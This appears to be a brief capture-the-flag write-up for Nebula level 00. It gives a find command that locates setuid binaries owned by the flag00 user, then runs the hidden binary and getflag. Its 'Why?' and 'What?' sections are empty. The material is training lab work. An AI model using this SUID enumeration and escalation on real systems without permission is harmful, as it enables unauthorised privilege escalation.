Armax's Notes

Nebula - Level 00

How?

# Search for files owned by flag00
find / -perm -4000 -type f -user flag00 2> /dev/null
# Output:
#   /bin/.../flag00
#   /rofs/bin/.../flag00

# Execute the binary and get the flag.
/bin/.../flag00
getflag

Why?

What?